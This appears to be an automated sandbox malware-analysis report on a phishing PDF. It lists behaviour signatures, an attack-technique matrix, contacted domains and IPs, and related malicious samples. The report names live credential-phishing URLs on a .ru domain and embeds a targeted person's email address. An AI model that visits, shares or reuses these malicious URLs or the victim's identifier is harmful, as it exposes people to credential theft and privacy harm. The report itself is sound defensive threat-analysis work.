Source: Google Drive.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Sburkholder.pdfInitial sample: PDF keyword /JS count = 0
Source: Sburkholder.pdfInitial sample: PDF keyword /JavaScript count = 0
Source: A917n7d6i_1lfnhoc_5e0.tmp.0.drInitial sample: PDF keyword /JS count = 0
Source: A917n7d6i_1lfnhoc_5e0.tmp.0.drInitial sample: PDF keyword /JavaScript count = 0
Source: Sburkholder.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
Source: Sburkholder.pdfInitial sample: PDF keyword obj count = 95
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585620 Sample: Sburkholder.pdf Startdate: 07/01/2025 Architecture: WINDOWS Score: 52 20 x1.i.lencr.org 2->20 32 Antivirus detection for URL or domain 2->32 34 AI detected suspicious Javascript 2->34 8 chrome.exe 8 2->8         started        11 Acrobat.exe 20 71 2->11         started        signatures3 process4 dnsIp5 22 192.168.2.16, 138, 443, 49364 unknown unknown 8->22 24 239.255.255.250 unknown Reserved 8->24 13 chrome.exe 8->13         started        16 AcroCEF.exe 108 11->16         started        process6 dnsIp7 26 sung.ethamoskag.ru 172.67.206.114, 443, 49718, 49719 CLOUDFLARENETUS United States 13->26 28 a.nel.cloudflare.com 35.190.80.1, 443, 49736, 49738 GOOGLEUS United States 13->28 30 14 other IPs or domains 13->30 18 AcroCEF.exe 6 16->18         started        process8

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://sung.ethamoskag.ru/0cUrcw3/#Msburkholder@heartland-derm.com100%SlashNextCredential Stealing type: Phishing & Social Engineering
https://sung.ethamoskag.ru/favicon.ico100%Avira URL Cloudmalware
https://sung.ethamoskag.ru/0cUrcw3/100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
sung.ethamoskag.ru
172.67.206.114
truetrue
    unknown
    bg.microsoft.map.fastly.net
    199.232.214.172
    truefalse
      high
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        code.jquery.com
        151.101.130.137
        truefalse
          high
          oc2lywudcicvf3zkzgbl7dddmd3whscnaebpxb4wz1idtmlwhfeig.ivertoneym.ru
          172.67.166.74
          truefalse
            high
            cdnjs.cloudflare.com
            104.17.25.14
            truefalse
              high
              challenges.cloudflare.com
              104.18.95.41
              truefalse
                high
                s-part-0017.t-0009.t-msedge.net
                13.107.246.45
                truefalse
                  high
                  sni1gl.wpc.omegacdn.net
                  152.199.21.175
                  truefalse
                    high
                    www.office.com
                    unknown
                    unknownfalse
                      high
                      x1.i.lencr.org
                      unknown
                      unknownfalse
                        high
                        aadcdn.msftauth.net
                        unknown
                        unknownfalse
                          high
                          login.microsoftonline.com
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718825931224384.OTQ5NWIxZWItYzQxNC00MjE0LTgxYWYtYzMyZTg3NWNhOTlmY2EwZjFhZDAtZTlmMC00ZDUyLWFiMDYtM2ZiMmRjZWJjZDVl&ui_locales=en-US&mkt=en-US&client-request-id=f8057c5a-282d-4166-9f5f-3591fe6ae2f0&state=WgDpnDtWNOhxv3ZZ-qEHB-D4Ijm93d9qhRVOmcsWhDnFNV-7_nsFkbtwgTJkrcZ14ERBVmASB34Gb_nZf4UN1hF7WelSUM7xyswZ2vei3RW4EYwIED1Glz16dyp_EDVwaSVh6FPE7NHRtTWvLQUXfJBZ1Pr9mr8ERBx34-z7qKtwfTnoJXchp2-Bd0HvtcRQlN0kXo9ZNVGVdURgzdn2SJiIBGpVipFGpfalr75ftWHDpY8VOH8kVQITQLtf5HONhAHsdo8hJKSLdp9j2IRqbg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=truefalse
                              high
                              https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                high
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe714c69d748c29&lang=autofalse
                                  high
                                  https://sung.ethamoskag.ru/favicon.icofalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8fe714c69d748c29/1736285766203/aPZ_CcXDlBoyNcSfalse
                                    high
                                    https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                      high
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8fe714c69d748c29/1736285766207/49c14c3b2e7a23b87f706815c596ec9ea68094171ae7dafa90c98c13a88b7c48/smJmz9q7H4detGhfalse
                                        high
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/nrw71/0x4AAAAAAA1mOjQlyo8gEN4C/auto/fbE/normal/auto/false
                                          high
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                            high
                                            https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718825931224384.OTQ5NWIxZWItYzQxNC00MjE0LTgxYWYtYzMyZTg3NWNhOTlmY2EwZjFhZDAtZTlmMC00ZDUyLWFiMDYtM2ZiMmRjZWJjZDVl&ui_locales=en-US&mkt=en-US&client-request-id=f8057c5a-282d-4166-9f5f-3591fe6ae2f0&state=WgDpnDtWNOhxv3ZZ-qEHB-D4Ijm93d9qhRVOmcsWhDnFNV-7_nsFkbtwgTJkrcZ14ERBVmASB34Gb_nZf4UN1hF7WelSUM7xyswZ2vei3RW4EYwIED1Glz16dyp_EDVwaSVh6FPE7NHRtTWvLQUXfJBZ1Pr9mr8ERBx34-z7qKtwfTnoJXchp2-Bd0HvtcRQlN0kXo9ZNVGVdURgzdn2SJiIBGpVipFGpfalr75ftWHDpY8VOH8kVQITQLtf5HONhAHsdo8hJKSLdp9j2IRqbg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                              high
                                              https://a.nel.cloudflare.com/report/v4?s=iiKpM3n5M0fDNFnrDcDsMdQtkaIjKmToRccg3viDHjNqN2XOzqX88%2FevpVitsfcfzvfW4rw3Mj8Ssv5w8%2FulVhzXQNf5iKkZCM0tl4XQVNCBSNUBj3pu56sR4ZbU3w%3D%3Dfalse
                                                high
                                                https://sung.ethamoskag.ru/0cUrcw3/#Msburkholder@heartland-derm.comtrue
                                                • SlashNext: Credential Stealing type: Phishing & Social Engineering
                                                unknown
                                                https://challenges.cloudflare.com/turnstile/v0/g/849bfe45bf45/api.jsfalse
                                                  high
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1702680241:1736281743:oHkGzRQEm0XBvPLraYKhN6D7o1wYu-qyAvxbR8tTHnY/8fe714c69d748c29/D9FHRl2BpZjliNMgDyuZOYbu5d2HtaznsinZzmz5MBU-1736285763-1.1.1.1-HKIOzuGxr_aQvzCfppdTbPN_zP_Hq18hKmQyJT3mFLCaJY32a.duvmYyY6NCi1itfalse
                                                    high
                                                    https://sung.ethamoskag.ru/0cUrcw3/true
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://chrome.cloudflare-dns.comda08b85e-ef1f-4e78-8401-d39604470569.tmp.3.dr, 64dccbd6-f575-4c5d-8458-9088b6140f56.tmp.3.drfalse
                                                      high
                                                      http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.2.drfalse
                                                        high
                                                        https://login.microsoftonline.comchromecache_208.16.dr, chromecache_199.16.drfalse
                                                          high
                                                          https://login.windows-ppe.netchromecache_208.16.dr, chromecache_199.16.drfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            151.101.130.137
                                                            code.jquery.comUnited States
                                                            54113FASTLYUSfalse
                                                            104.21.42.208
                                                            unknownUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            151.101.66.137
                                                            unknownUnited States
                                                            54113FASTLYUSfalse
                                                            35.190.80.1
                                                            a.nel.cloudflare.comUnited States
                                                            15169GOOGLEUSfalse
                                                            172.67.166.74
                                                            oc2lywudcicvf3zkzgbl7dddmd3whscnaebpxb4wz1idtmlwhfeig.ivertoneym.ruUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            172.67.206.114
                                                            sung.ethamoskag.ruUnited States
                                                            13335CLOUDFLARENETUStrue
                                                            104.18.95.41
                                                            challenges.cloudflare.comUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            239.255.255.250
                                                            unknownReserved
                                                            unknownunknownfalse
                                                            104.17.25.14
                                                            cdnjs.cloudflare.comUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            IP
                                                            192.168.2.16
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1585620
                                                            Start date and time:2025-01-07 22:34:08 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 4m 23s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:21
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:Sburkholder.pdf
                                                            Detection:MAL
                                                            Classification:mal52.winPDF@32/125@34/10
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .pdf
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 23.56.252.213, 52.6.155.20, 3.219.243.226, 52.22.41.97, 3.233.129.217, 199.232.214.172, 172.64.41.3, 162.159.61.3, 23.209.209.135, 2.16.168.107, 2.16.168.105, 216.58.206.67, 142.250.185.174, 66.102.1.84, 142.250.185.206, 142.250.74.206, 216.58.212.174, 172.217.16.206, 20.190.159.71, 20.190.159.64, 40.126.31.73, 20.190.159.0, 20.190.159.23, 20.190.159.75, 40.126.31.71, 40.126.31.69, 13.107.6.156, 142.250.186.46, 142.250.181.238, 216.58.206.42, 142.250.186.170, 142.250.185.106, 142.250.185.234, 142.250.186.138, 142.250.185.138, 142.250.181.234, 216.58.206.74, 142.250.186.74, 172.217.18.106, 142.250.185.170, 142.250.184.202, 172.217.16.138, 172.217.23.106, 142.250.185.202, 216.58.212.170, 20.50.80.213, 23.56.254.164, 20.12.23.50, 23.217.172.185, 204.79.197.200, 20.190.159.2, 51.104.15.253, 23.1.33.206, 204.79.197.222, 150.171.85.254, 13.107.246.45, 20.190.159.4
                                                            • Excluded domains from analysis (whitelisted): fp.msedge.net, p-ring.msedge.net, e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, clientservices.googleapis.com, home-office365-com.b-0004.b-msedge.net, ak.privatelink.msidentity.com, acroipm2.adobe.com, clients2.google.com, redirector.gvt1.com, login.live.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, r.bing.com, login.mso.msidentity.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, www.bing.com, www.tm.ak.prd.aadg.trafficmanager.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, aadcdnoriginwus2.azureedge.net, b-0004.b-msedge.net, onedscolprdneu08.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, aadcdn.msauth.net, p13n.adobe.io, t-ring.msedge.net, firstparty-azurefd-prod.trafficmanager.net, eu.events.data.trafficmanager.net, fe3cr.delivery.mp.micro
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: Sburkholder.pdf
                                                            TimeTypeDescription
                                                            16:34:48API Interceptor3x Sleep call for process: AcroCEF.exe modified
                                                            SourceURL
                                                            Screenshothttps://sUNg.ethamoskag.ru/0cUrcw3/#Msburkholder@heartland-derm.com
                                                            Screenshothttps://sUNg.ethamoskag.ru/0cUrcw3/#Msburkholder@heartland-derm.com
                                                            Screenshothttps://sUNg.ethamoskag.ru/0cUrcw3/#Msburkholder@heartland-derm.com
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            104.21.42.208https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526Get hashmaliciousUnknownBrowse
                                                              https://t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogoGet hashmaliciousHTMLPhisherBrowse
                                                                151.101.66.137http://novo.oratoriomariano.com/novo/Get hashmaliciousUnknownBrowse
                                                                • code.jquery.com/jquery-3.3.1.min.js
                                                                http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
                                                                • code.jquery.com/jquery-1.7.min.js
                                                                http://site9615380.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                                                • code.jquery.com/jquery-1.7.2.min.js
                                                                http://grandprairie-water-damage-restoration.comGet hashmaliciousUnknownBrowse
                                                                • code.jquery.com/jquery-3.3.1.min.js
                                                                2023121142000021ki01kvjs.htmlGet hashmaliciousUnknownBrowse
                                                                • code.jquery.com/jquery-latest.min.js
                                                                151.101.130.137http://mi-outlook-loggin.click/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                • code.jquery.com/jquery-1.11.3.min.js
                                                                http://imaps-support.us/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                • code.jquery.com/jquery-1.11.3.min.js
                                                                http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
                                                                • code.jquery.com/jquery-1.7.min.js
                                                                https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AING.shalominternationalministry.com/index.xml%23?email=amFtZXMubGVhZGJlYXRlckBsb2dpY2FsaXMuY29tGet hashmaliciousUnknownBrowse
                                                                • code.jquery.com/jquery-3.3.1.min.js
                                                                http://site9613885.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                                                • code.jquery.com/jquery-1.7.2.min.js
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                cdnjs.cloudflare.comhttps://juddshaw.acemlnc.com/lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~juswGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.17.25.14
                                                                audio.mp3_JasonhTranscript.htmlGet hashmaliciousUnknownBrowse
                                                                • 104.17.24.14
                                                                https://pozaweclip.upnana.com/Get hashmaliciousUnknownBrowse
                                                                • 104.17.24.14
                                                                https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29tGet hashmaliciousUnknownBrowse
                                                                • 104.17.24.14
                                                                Globalfoundries eCHECK- Payment Advice.htmlGet hashmaliciousUnknownBrowse
                                                                • 104.17.24.14
                                                                https://sites.google.com/view/jet-consultation-llc/homeGet hashmaliciousUnknownBrowse
                                                                • 104.17.24.14
                                                                http://sammobile.digidip.net/visit?url=https://massageclinic.com.au/wadblacks2&currurl=https://www.sammobile.com/2018/06/06/june-2018-security-patch-information-published-by-samsung/Get hashmaliciousGabagoolBrowse
                                                                • 104.17.25.14
                                                                https://viirtus.com/?uhqubmdv=6b0cf7592247f0ce6faa27a3b42d16a0fdea3bcbc625e658150f2141942e41191a6f5794e3683bbd4b95a6a792b5cafae4f710289eba79c968c11a2e84a1f677Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                • 104.17.25.14
                                                                http://11ofus.caGet hashmaliciousUnknownBrowse
                                                                • 104.17.25.14
                                                                Airbornemx_PAYOUT7370.odtGet hashmaliciousUnknownBrowse
                                                                • 104.17.25.14
                                                                code.jquery.comaudio.mp3_JasonhTranscript.htmlGet hashmaliciousUnknownBrowse
                                                                • 151.101.194.137
                                                                https://pozaweclip.upnana.com/Get hashmaliciousUnknownBrowse
                                                                • 151.101.194.137
                                                                https://link.edgepilot.com/s/692fcd16/rcPy0yXyykq_mRLKroUvRQ?u=https://petroleumalliance.us8.list-manage.com/track/click?u=325f73d29a0b4f85a46b700a9%26id=dfe369da82%26e=94c2db4428Get hashmaliciousUnknownBrowse
                                                                • 151.101.194.137
                                                                https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29tGet hashmaliciousUnknownBrowse
                                                                • 151.101.194.137
                                                                Globalfoundries eCHECK- Payment Advice.htmlGet hashmaliciousUnknownBrowse
                                                                • 151.101.130.137
                                                                ATT562720.htmGet hashmaliciousUnknownBrowse
                                                                • 151.101.66.137
                                                                https://sites.google.com/view/jet-consultation-llc/homeGet hashmaliciousUnknownBrowse
                                                                • 151.101.2.137
                                                                http://sammobile.digidip.net/visit?url=https://massageclinic.com.au/wadblacks2&currurl=https://www.sammobile.com/2018/06/06/june-2018-security-patch-information-published-by-samsung/Get hashmaliciousGabagoolBrowse
                                                                • 151.101.194.137
                                                                Airbornemx_PAYOUT7370.odtGet hashmaliciousUnknownBrowse
                                                                • 151.101.2.137
                                                                https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526Get hashmaliciousUnknownBrowse
                                                                • 151.101.130.137
                                                                bg.microsoft.map.fastly.netU02LaPwnkd.exeGet hashmaliciousValleyRATBrowse
                                                                • 199.232.210.172
                                                                c2.htaGet hashmaliciousRemcosBrowse
                                                                • 199.232.210.172
                                                                FACTURAMAIL.htmlGet hashmaliciousUnknownBrowse
                                                                • 199.232.214.172
                                                                3e18bdf74f3caef770a7edcf748bdaf0e6a4a21664e69.exeGet hashmaliciousAsyncRAT, GhostRatBrowse
                                                                • 199.232.214.172
                                                                Kawpow new.exeGet hashmaliciousUnknownBrowse
                                                                • 199.232.210.172
                                                                https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526Get hashmaliciousUnknownBrowse
                                                                • 199.232.214.172
                                                                Here is the completed and scanned document.emlGet hashmaliciousUnknownBrowse
                                                                • 199.232.214.172
                                                                file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zipGet hashmaliciousUnknownBrowse
                                                                • 199.232.214.172
                                                                c2.htaGet hashmaliciousRemcosBrowse
                                                                • 199.232.210.172
                                                                sfqbr.ps1Get hashmaliciousDcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                • 199.232.214.172
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                FASTLYUSGTA5-elamigos.exeGet hashmaliciousEsquele StealerBrowse
                                                                • 185.199.108.133
                                                                GTA5-elamigos.exeGet hashmaliciousEsquele StealerBrowse
                                                                • 185.199.108.133
                                                                https://t.co/sSZe0hnReUGet hashmaliciousUnknownBrowse
                                                                • 199.232.188.159
                                                                audio.mp3_JasonhTranscript.htmlGet hashmaliciousUnknownBrowse
                                                                • 151.101.194.137
                                                                https://dev-alberta-ca.pantheonsite.io/?email=central@ngps.caGet hashmaliciousUnknownBrowse
                                                                • 23.185.0.4
                                                                https://pozaweclip.upnana.com/Get hashmaliciousUnknownBrowse
                                                                • 151.101.2.137
                                                                https://us01-i-prod-estimating-storage.s3.amazonaws.com/598134325679181/562949954787293/Documents/1706942/Hoosier%20Crane%20Service%20Company.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                • 151.101.2.137
                                                                https://link.edgepilot.com/s/692fcd16/rcPy0yXyykq_mRLKroUvRQ?u=https://petroleumalliance.us8.list-manage.com/track/click?u=325f73d29a0b4f85a46b700a9%26id=dfe369da82%26e=94c2db4428Get hashmaliciousUnknownBrowse
                                                                • 151.101.195.9
                                                                https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29tGet hashmaliciousUnknownBrowse
                                                                • 151.101.2.137
                                                                Globalfoundries eCHECK- Payment Advice.htmlGet hashmaliciousUnknownBrowse
                                                                • 151.101.2.137
                                                                CLOUDFLARENETUSGTA5-elamigos.exeGet hashmaliciousEsquele StealerBrowse
                                                                • 188.114.96.3
                                                                GTA5-elamigos.exeGet hashmaliciousEsquele StealerBrowse
                                                                • 188.114.97.3
                                                                https://juddshaw.acemlnc.com/lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~juswGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.17.25.14
                                                                https://t.co/sSZe0hnReUGet hashmaliciousUnknownBrowse
                                                                • 172.66.0.227
                                                                dog.jpg.exeGet hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                random.exeGet hashmaliciousCStealerBrowse
                                                                • 162.159.128.233
                                                                random.exeGet hashmaliciousCStealerBrowse
                                                                • 172.67.74.152
                                                                audio.mp3_JasonhTranscript.htmlGet hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                47SXvEQ.exeGet hashmaliciousBlank Grabber, XmrigBrowse
                                                                • 162.159.135.232
                                                                QoRXFaE8Xn.exeGet hashmaliciousDCRatBrowse
                                                                • 188.114.96.3
                                                                FASTLYUSGTA5-elamigos.exeGet hashmaliciousEsquele StealerBrowse
                                                                • 185.199.108.133
                                                                GTA5-elamigos.exeGet hashmaliciousEsquele StealerBrowse
                                                                • 185.199.108.133
                                                                https://t.co/sSZe0hnReUGet hashmaliciousUnknownBrowse
                                                                • 199.232.188.159
                                                                audio.mp3_JasonhTranscript.htmlGet hashmaliciousUnknownBrowse
                                                                • 151.101.194.137
                                                                https://dev-alberta-ca.pantheonsite.io/?email=central@ngps.caGet hashmaliciousUnknownBrowse
                                                                • 23.185.0.4
                                                                https://pozaweclip.upnana.com/Get hashmaliciousUnknownBrowse
                                                                • 151.101.2.137
                                                                https://us01-i-prod-estimating-storage.s3.amazonaws.com/598134325679181/562949954787293/Documents/1706942/Hoosier%20Crane%20Service%20Company.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                • 151.101.2.137
                                                                https://link.edgepilot.com/s/692fcd16/rcPy0yXyykq_mRLKroUvRQ?u=https://petroleumalliance.us8.list-manage.com/track/click?u=325f73d29a0b4f85a46b700a9%26id=dfe369da82%26e=94c2db4428Get hashmaliciousUnknownBrowse
                                                                • 151.101.195.9
                                                                https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29tGet hashmaliciousUnknownBrowse
                                                                • 151.101.2.137
